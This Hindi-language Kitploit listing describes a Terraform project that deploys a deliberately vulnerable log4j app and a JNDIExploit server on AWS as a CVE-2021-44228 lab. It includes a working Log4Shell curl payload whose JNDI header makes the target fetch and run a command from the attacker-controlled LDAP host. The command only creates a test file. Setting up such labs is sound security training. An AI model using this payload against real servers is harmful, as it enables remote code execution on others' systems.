Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-vulnerable-app-cve-2021-44228-terraform — एक कमजोर ऐप को तैनात करने के लिए Terraform और CVE-2021-44228 के साथ काम करने के लिए JDNIExploit | Kitploit
उपकरण/GitHubGitHub/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform
क्लाउड इन्फ्रास्ट्रक्चर सुरक्षापेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubmkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform

log4j-vulnerable-app-cve-2021-44228-terraform

एक कमजोर ऐप को तैनात करने के लिए Terraform और CVE-2021-44228 के साथ काम करने के लिए JDNIExploit

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
2144 साल पहलेअभी तक समीक्षित नहीं
साझा करें

log4j-vulnerable-app-cve-2021-44228-terraform

एक Terraform जो कमजोर ऐप और CVE-2021-44228 के साथ काम करने के लिए JNDIExploit को तैनात करता है

स्टैक के बारे में

यह Terraform AWS Cloud में एक VPC पर दो इंस्टेंस बनाता है।

आपको बस अपनी AWS_ACCESS_KEY_ID और AWS_SECRET_ACCESS_KEY को export करने की आवश्यकता है।

एक इंस्टेंस JNDIExploit है।

दूसरा Vulnerable-App है जो log4j शोषण के लिए है।

कृपया आवेदन करने से पहले terraform में अपनी SSH-Public-Key को बदल दें

root@kitploit:~
terraform init
terraform plan
terraform apply --auto-approve

शोषण

AWS पर तैनाती के बाद आप इसे curl अनुरोध से शोषित कर सकते हैं, और vulnerable-app कंटेनर पर /tmp में फ़ाइल निर्माण सत्यापित कर सकते हैं।

root@kitploit:~
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

vulnerable app सर्वर पर निम्न कमांड चलाएँ ताकि कमांड निष्पादन सत्यापित हो सके, आपको pwned फ़ाइल देखनी चाहिए।

root@kitploit:~
sudo docker exec -ti vulnerable-app ls /tmp
टूल डाउनलोड करें